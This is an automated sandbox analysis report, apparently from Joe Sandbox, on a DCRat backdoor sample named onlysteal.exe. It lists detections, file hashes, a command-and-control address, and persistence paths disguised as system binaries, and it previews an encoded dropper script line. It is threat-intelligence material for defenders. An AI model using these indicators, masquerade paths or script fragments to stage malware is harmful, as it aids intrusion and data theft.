                                  C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Users\user\Desktop\zVMHRGyj.log | 100% | Avira | TR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\plugneHL.log | 100% | Avira | TR/AVI.Agent.updqb
                                  C:\Users\user\Desktop\AchrHOgY.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Users\user\Desktop\vmGXvtnF.log | 100% | Avira | TR/PSW.Agent.qngqt
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Intorefnet\hyperBlockCrtCommon.exe | 100% | Avira | HEUR/AGEN.1309961
                                  C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat | 100% | Avira | BAT/Delbat.C
                                  C:\Users\user\Desktop\BUHwkZnR.log | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\DYEovgjB.log | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\kzbsFheO.log | 100% | Joe Sandbox ML |
                                  C:\ProgramData\smss.exe | 100% | Joe Sandbox ML |
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\AchrHOgY.log | 100% | Joe Sandbox ML |
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | 100% | Joe Sandbox ML |
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Joe Sandbox ML |
                                  C:\Users\user\Desktop\vmGXvtnF.log | 100% | Joe Sandbox ML |
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 100% | Joe Sandbox ML |
                                  C:\Intorefnet\hyperBlockCrtCommon.exe | 100% | Joe Sandbox ML |
                                  C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\Intorefnet\hyperBlockCrtCommon.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\ProgramData\smss.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exe | 83% | ReversingLabs | ByteCode-MSIL.Backdoor.DCRat
                                  C:\Users\user\Desktop\AchrHOgY.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\BUHwkZnR.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\DYEovgjB.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\FPzqkKvM.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\RpedHXOW.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\kzbsFheO.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\plugneHL.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\vmGXvtnF.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\wYGfctxY.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\zVMHRGyj.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                                  No Antivirus matches
                                  No Antivirus matches
                                  Source | Detection | Scanner | Label
                                  http://185.216.71.25/ | 0% | Avira URL Cloud | safe
                                  http://185.216.71.25 | 0% | Avira URL Cloud | safe
                                  http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.php | 0% | Avira URL Cloud | safe
                                  http://185.216.71.25puW | 0% | Avira URL Cloud | safe
                                  No contacted domains info
                                  Name | Malicious | Antivirus Detection | Reputation
                                  http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.php | true | Avira URL Cloud: safe | unknown

                                  Name | Source | Malicious | Antivirus Detection | Reputation
                                  http://185.216.71.25 | SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                                  http://185.216.71.25puW | SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hyperBlockCrtCommon.exe, 00000005.00000002.2165352874.0000000003390000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                  http://185.216.71.25/ | SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    185.216.71.25 | unknown | Germany | 43659 | CLOUDCOMPUTINGDE | true
                                    Joe Sandbox version: 41.0.0 Charoite
                                    Analysis ID: 1583653
                                    Start date and time: 2025-01-03 09:09:05 +01:00
                                    Joe Sandbox product: CloudBasic
                                    Overall analysis duration: 0h 7m 40s
                                    Hypervisor based Inspection enabled: false
                                    Report type: full
                                    Cookbook file name: default.jbs
                                    Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of new started processes analysed: 28
                                    Number of new started drivers analysed: 0
                                    Number of existing processes analysed: 0
                                    Number of existing drivers analysed: 0
                                    Number of injected processes analysed: 0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode: default
                                    Analysis stop reason: Timeout
                                    Sample name: onlysteal.exe
                                    Detection: MAL
                                    Classification: mal100.troj.evad.winEXE@45/39@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 91%
                                    • Number of executed functions: 249
                                    • Number of non-executed functions: 109
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes were analyzed; the report is missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    Time | Type | Description
                                    03:11:00 | API Interceptor | 2x Sleep call for process: SgrmBroker.exe modified
                                    No context
                                    No context
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    CLOUDCOMPUTINGDE | WC2SD38tcf.exe | malicious | Stealc | 185.216.71.4
                                    | hidakibest.arm6.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.ppc.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.mips.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.x86.elf | malicious | Mirai, Gafgyt | 185.216.71.152
                                    | hidakibest.arm5.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.arm4.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.mpsl.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.arm7.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    | hidakibest.sparc.elf | malicious | Gafgyt, Mirai | 185.216.71.152
                                    No context
                                    No context
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: ASCII text, with very long lines (913), with no line terminators
                                    Category: dropped
                                    Size (bytes): 913
                                    Entropy (8bit): 5.918326214196409
                                    Encrypted: false
                                    SSDEEP: 24:mJaSWydsYN37Te1Uqwx5wAeS5sq8VuzM0:mYS4YNLQwx5wAVsMzM0
                                    MD5: C3428824BB235BDDDAC09D2C527725F1
                                    SHA1: 24E8AA4A560275DF2064564D347121A0BCD6213F
                                    SHA-256: 1CD013A64D15DBA02D8A57D0701D3A23D708B5E2C8FE7E8260D2DA858EF8D140
                                    SHA-512: E4B5F8E158D588BA76A03C1A78FCA1EC17504AE8C19CACE4116A6709ACBC178321722A496AA73CFA5207F4918E69DD46C2F489618533A520BB16105C5439D84A
                                    Malicious: false
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category: dropped
                                    Size (bytes): 689664
                                    Entropy (8bit): 5.558791715418654
                                    Encrypted: false
                                    SSDEEP: 12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5: 88475FFCF70BAFDA27644064BD214F2A
                                    SHA1: 650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256: F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512: C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious: true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process: C:\Users\user\Desktop\onlysteal.exe
                                    File Type: ASCII text, with CRLF line terminators
                                    Category: dropped
                                    Size (bytes): 84
                                    Entropy (8bit): 5.0994202926105725
                                    Encrypted: false
                                    SSDEEP: 3:2dvHHjLjaHmKQQDLhKGZRmLLVAjA:2dvHHTKgG+LO8
                                    MD5: 7FEF6D8E0A11E2DEC6AF7A0E3B952B06
                                    SHA1: B95534ABB31712B49087005DA4CDD4C92FE35EDD
                                    SHA-256: 6BB327123F7EC740BB03B3405C5CD790199BA132091D1CEAE4F098A29C0E9592
                                    SHA-512: 2C19D8AC297E3E0D790F844AEDAC3BE3934A274BA834B66F36994CCDFD8E8C49B836D7A0DF1E28DE999CEC7E1B5984A90199F4E08BC30D8113C4852FB9A27703
                                    Malicious: false
                                    Preview: %vcyLdZDYcrUTV%%rEzZNNVh%..%VAMCshwUC%"C:\Intorefnet/hyperBlockCrtCommon.exe"%udzTq%
                                    Process: C:\Users\user\Desktop\onlysteal.exe
                                    File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category: dropped
                                    Size (bytes): 689664
                                    Entropy (8bit): 5.558791715418654
                                    Encrypted: false
                                    SSDEEP: 12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5: 88475FFCF70BAFDA27644064BD214F2A
                                    SHA1: 650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256: F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512: C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious: true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Intorefnet\hyperBlockCrtCommon.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process: C:\Users\user\Desktop\onlysteal.exe
                                    File Type: data
                                    Category: dropped
                                    Size (bytes): 206
                                    Entropy (8bit): 5.793981930782848
                                    Encrypted: false
                                    SSDEEP: 6:GmgwqK+NkLzWbH9WF08nZNDd3RL1wQJRFVqagNM:GmBMCzWL74d3XBJDVZ
                                    MD5: 926C428EAA357B6FF5474252EE2821FE
                                    SHA1: 623205127383F9CC804A3AF035448CC396E704E3
                                    SHA-256: 80675C3AE85F284B0E291B368560CC5727D416F1F52577E6505DB41B0ADD9BC1
                                    SHA-512: CDB460848EDBC5B8053B0B5211FCE7D5F5EB92B347526B3E1D98BECBFE1D4F8FB277AC3C58EAB64B532F57C4C3B6F5642A9FAD04C22F2910EECB0633079FB4AC
                                    Malicious: true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview: #@~^tQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v*T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJqUDWM+0.+D&z:+.!7,}8wL?w0|Apj" 8lDJBPT~~WmVd+czgAAA==^#~@.
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: ASCII text, with very long lines (931), with no line terminators
                                    Category: dropped
                                    Size (bytes): 931
                                    Entropy (8bit): 5.911276293867402
                                    Encrypted: false
                                    SSDEEP: 12:XuPIjoLhBcIlL/G57sxS861wnqMRnxPt9IKsK8qTkMw43gScjFcyDvl6qn:X/jO3cc/GSxn6mqMlyK7TS43YhPrcc
                                    MD5: 29E151CCF69A0E2A1E0326245CEE2F4B
                                    SHA1: 7A5FE8116CCAF6F924F1828017CDD162C2EF69C7
                                    SHA-256: A0B98A8AE23FC1F1D4B41D8A229BC508387BA0AB1F6261BC0D419D7A001165F0
                                    SHA-512: 34A7DD43F3CB0933983156D01F99A172B419BF7F356F8991A8FED6CF9457D6016ECD7AB4CDA290DF0D3EC0F17D397ADFDA3C09ED51B8D53432F2CEAAC677B881
                                    Malicious: false
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category: dropped
                                    Size (bytes): 689664
                                    Entropy (8bit): 5.558791715418654
                                    Encrypted: false
                                    SSDEEP: 12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5: 88475FFCF70BAFDA27644064BD214F2A
                                    SHA1: 650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256: F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512: C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious: true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: ASCII text, with very long lines (828), with no line terminators
                                    Category: dropped
                                    Size (bytes): 828
                                    Entropy (8bit): 5.888719443812523
                                    Encrypted: false
                                    SSDEEP: 24:Y0vf/uyDN/jtm6xFF1PRFTOIuGZBhu8AatM:Y0PhN/jwG8GZBhpAAM
                                    MD5: 56CAF2169525EEC1362D046FEF49BB96
                                    SHA1: 61D2635C0C2EF17FBD28DC086F582D61A7DC2979
                                    SHA-256: A73E886869C129587BFF015D5FC25B1B87227B6E68C257631AB6F1810DE9EF9E
                                    SHA-512: 0CB36778EFBDC39B0ED3EFDD8A03EB3AFF7117E9C04F7A88E9714223E436AC0D51CE3F497D2B94D3F418A90709502A058C7EE1D51AF0889B396F6DB0E7E63D3B
                                    Malicious: false
                                    Process: C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category: dropped
                                    Size (bytes): 689664
                                    Entropy (8bit): 5.558791715418654
                                    Encrypted: false
                                    SSDEEP: 12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5: 88475FFCF70BAFDA27644064BD214F2A
                                    SHA1: 650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256: F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512: C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious: true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\smss.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (808), with no line terminators
                                    Category:dropped
                                    Size (bytes):808
                                    Entropy (8bit):5.914538938523479
                                    Encrypted:false
                                    SSDEEP:24:sQmAPxCuGiQLSl9L1EGubJ1iDTdg4bWwerhe1mWQv:/BEZ+LStbPiDbbWwasJQv
                                    MD5:D6C172655513F15E91D30EA488FD4982
                                    SHA1:5E77DD7966A80D8A54045581AE94639C72E1EB7B
                                    SHA-256:69DF0AA1E03580B3AD53802C0146E1FE6BFA722EB169BD396345410F7E779406
                                    SHA-512:731CE2B98B5C2635A17AB01EAC7DAEFB89E89D86960435DA35057C745362880ABC6380635A3F9A50BB087BDAFCCA9241CAC0D46752F4AA6DCB2C472B6B05F36C
                                    Malicious:false
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (813), with no line terminators
                                    Category:dropped
                                    Size (bytes):813
                                    Entropy (8bit):5.899145702506883
                                    Encrypted:false
                                    SSDEEP:24:ECU+lXFIF7HCK9MQdQ9JUbUrLSmzusDxfxgXA4O:ECU+lSdHCmMnJ5rLlNxgQ4O
                                    MD5:FB166FC379AEE109517CC6672217CAA6
                                    SHA1:DD7F2883DCBC950DE9018E57A6DE28E2DF63C8A4
                                    SHA-256:74F26FE88B4A45F68227F40CB0F8E73F6BB13DA23D55637044FD031418ACE90F
                                    SHA-512:77E2D70F6AE0CED606BAAAEADB975C5401B250B1B54A8D176C990ED61555DFD1CBB530DD1EE13C0505C1682A4D14EEA1FAF6B207BA00FEF65178375F7C068157
                                    Malicious:false
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1613
                                    Entropy (8bit):5.370675888495854
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                    MD5:CFCC907668E9B1AED46D457F77536393
                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):1613
                                    Entropy (8bit):5.370675888495854
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                    MD5:CFCC907668E9B1AED46D457F77536393
                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.103465189601646
                                    Encrypted:false
                                    SSDEEP:3:3SVimd:iXd
                                    MD5:E38D1E302F867B6B193AB00C548CBF11
                                    SHA1:702BECBB6F0ADD816BCA1E3BA2F3FA51D6444797
                                    SHA-256:ED2FCBC789C6A3FB664A834ED782E910F69B5DC44EBD2494D38BBE2D19A7EFA8
                                    SHA-512:CCBC537B9AB8DDD44DB4E2E66F41ABDD4422499D5829A02EF0D9A712888FB2751E7C2B1037B86B72C29FCC2C0DC953139B401AA1C7DA638AE8CCA788CBA2A6EC
                                    Malicious:false
                                    Preview:CaqCFwZrbhwD40JhTuB3h6CXF
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.12810937060124
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIZZQnSqn:hCRLuVFOOr+DE1WD5um0KOZG1N723fZq
                                    MD5:BD6648A01E1CA2823ED47955B2AA0F16
                                    SHA1:8F789F9035E4476D62B69EB6C2169DE857FF6A0A
                                    SHA-256:69F60B2A4D7417BEA5974444506C246EB152EF668A8F07B4A207107C24733187
                                    SHA-512:E2AFD8F8D81F9C213A9C1B6AD29A01C67120177EECC0EF507439354DC6947F59C5F1F34540063A5C2396511291C4E9F7FD9E9F0F6B9166A1DAB1832E6943D12B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
